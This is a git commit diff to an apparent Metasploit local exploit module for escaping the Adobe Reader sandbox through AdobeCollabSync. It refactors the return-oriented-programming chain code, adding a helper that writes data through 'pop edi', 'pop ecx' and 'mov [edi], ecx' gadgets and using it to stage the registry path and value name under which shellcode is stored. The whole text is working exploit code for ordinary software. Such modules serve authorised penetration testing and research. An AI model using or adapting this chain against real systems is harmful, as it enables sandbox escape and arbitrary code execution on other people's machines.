Fix @jlee-r7's feedback

2013-05-20 18:44:21 -05:00 · 2013-05-20 18:44:21 -05:00 · 53cb493bc9
parent 85ceaa1a62
commit 53cb493bc9
1 changed files with 18 additions and 23 deletions
--- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
+++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
@ -185,6 +185,19 @@ class Metasploit3 < Msf::Exploit::Local
 		vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
 	end

+	def store(buf, data, address)
+		i = 0
+		while (i < data.length)
+			buf << [@gadgets['pop edi # ret']].pack("V")
+			buf << [address + i].pack("V") # edi
+			buf << [@gadgets['pop ecx # ret']].pack("V")
+			buf << data[i, 4].ljust(4,"\x00") # ecx
+			buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
+			i = i + 4
+		end
+		return i
+	end
+
 	def create_rop_chain
 		mem = 0x0c0c0c0c

@ -210,31 +223,13 @@ class Metasploit3 < Msf::Exploit::Local

 		# Put in the allocated memory the necessary data in order to read the
 		# shellcode stored in the registry
-		# The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
-		# The reg entry: shellcode
-		# The output buffer size: 0x3000
+		# 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
 		reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
-		j = 0
-		while (j < reg_key.length)
-			buf << [@gadgets['pop edi # ret']].pack("V")
-			buf << [mem + j].pack("V") # edi
-			buf << [@gadgets['pop ecx # ret']].pack("V")
-			buf << reg_key[j, 4].ljust(4,"\x00") # ecx
-			buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
-			j = j + 4
-		end
-		k = j
+		reg_key_length = store(buf, reg_key, mem)
+		# 2) The reg entry: shellcode
 		value_key = "shellcode\x00"
-		j = 0
-		while (j < value_key.length)
-			buf << [@gadgets['pop edi # ret']].pack("V")
-			buf << [mem + k + j].pack("V")         # edi
-			buf << [@gadgets['pop ecx # ret']].pack("V")
-			buf << value_key[j, 4].ljust(4,"\x00") # ecx
-			buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
-			j = j + 4
-		end
-
+		store(buf, value_key, mem + reg_key_length)
+		# 3) The output buffer size: 0x3000
 		size_buffer = 0x3000
 		buf << [@gadgets['pop edi # ret']].pack("V")
 		buf << [mem + 0x50].pack("V") # edi